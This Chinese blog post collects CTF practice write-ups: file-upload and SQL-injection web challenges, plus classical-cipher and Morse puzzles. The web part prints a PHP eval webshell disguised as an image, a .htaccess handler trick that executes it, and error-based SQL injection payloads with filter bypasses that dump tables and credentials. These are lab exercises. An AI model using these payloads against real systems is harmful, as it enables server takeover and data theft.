第七周第一次

WEB

[MRCTF2020]你传你🐎呢

​编辑

[极客大挑战 2019]HardSQL

Crypto

萌萌哒的八戒

传统知识+古典密码

Misc

假如给我三天光明

后门查杀


文件上传 我们进行尝试 

设置一个 1.jpg的一句话木马

GIF89a
<script language='php'>eval($_POST['a']);</script>

然后抓包改后缀 发现都不行 于是想到让 图片作为php来解析

.htaccess

SetHandler application/x-httpd-php

我们在上传一句话木马后 进行上传这个文件 让图片可以作为php来使用

进行抓包 然后更改

改为

image/jpeg

 

上传成功 然后我们直接进行蚁剑链接图片即可

http://534a8674-4d20-4e4a-8e8e-1b82af752c3b.node4.buuoj.cn:81/upload/8fe5b08686372083104ab7b299db9c64/1.jpg

说明是

username='1''

 这种 然后我们开始 万能密码

1' or '1'='1

很明显是过滤了什么 但是源代码又没有出现任何的过滤信息

这种时候 就使用bp进行爆破 看看过滤了什么

网络上找fuzz的字典

 

开始爆破

 两个长度 发现 736是过滤的 751是没有过滤的

其中我们使用得到

空格   ---》()
=   ----》like

开始查看数据库

我们使用报错注入

用户注入 admin'or(updatexml(1,concat(0x7e,database()),3))#admin
密码注入 0'like(updatexml(1,concat(0x7e,database()),3))#

得到数据库

开始爆表

密码
0'like(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#用户
admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#

 得到表 开始爆字段

密码 admin
0'like(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),3))#
用户
admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),3))#

开始得到这些

密码
admin
0'like(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1))),3))#账号
admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1))),3))#

发现长度不够

flag{ca65a277-9271-4a11-8a

使用left 和right

0'like(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)where(username)like('flag'))),3))#
flag{ca65a277-9271-4a11-8a7c-3
0'like(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)where(username)like('flag'))),3))#7-9271-4a11-8a7c-30c698f0f31b}
flag{ca65a277-9271-4a11-8a7c-30c698f0f31b}

flag{whenthepigwanttoeat}

 一甲子=60年

28  30  23 08  17  10  16  30
+60
88  90  83  68  77  70  76  90
ascii
XZSDMFLZ

然后开始尝试栅栏密码等

CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码

BUUCTF—传统知识+古典密码_buuctf 传统知识+古典密码_小常吃不下了的博客-CSDN博客

得到flag

 

kmdonowg

 解压文件

听音乐是莫斯密码

CTFWPEI08732?23D
flag{wpei08732?23dz}

 访问include

 

点赞(0) 打赏

评论列表 共有 0 条评论

暂无评论

微信小程序

微信扫一扫体验

立即
投稿

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部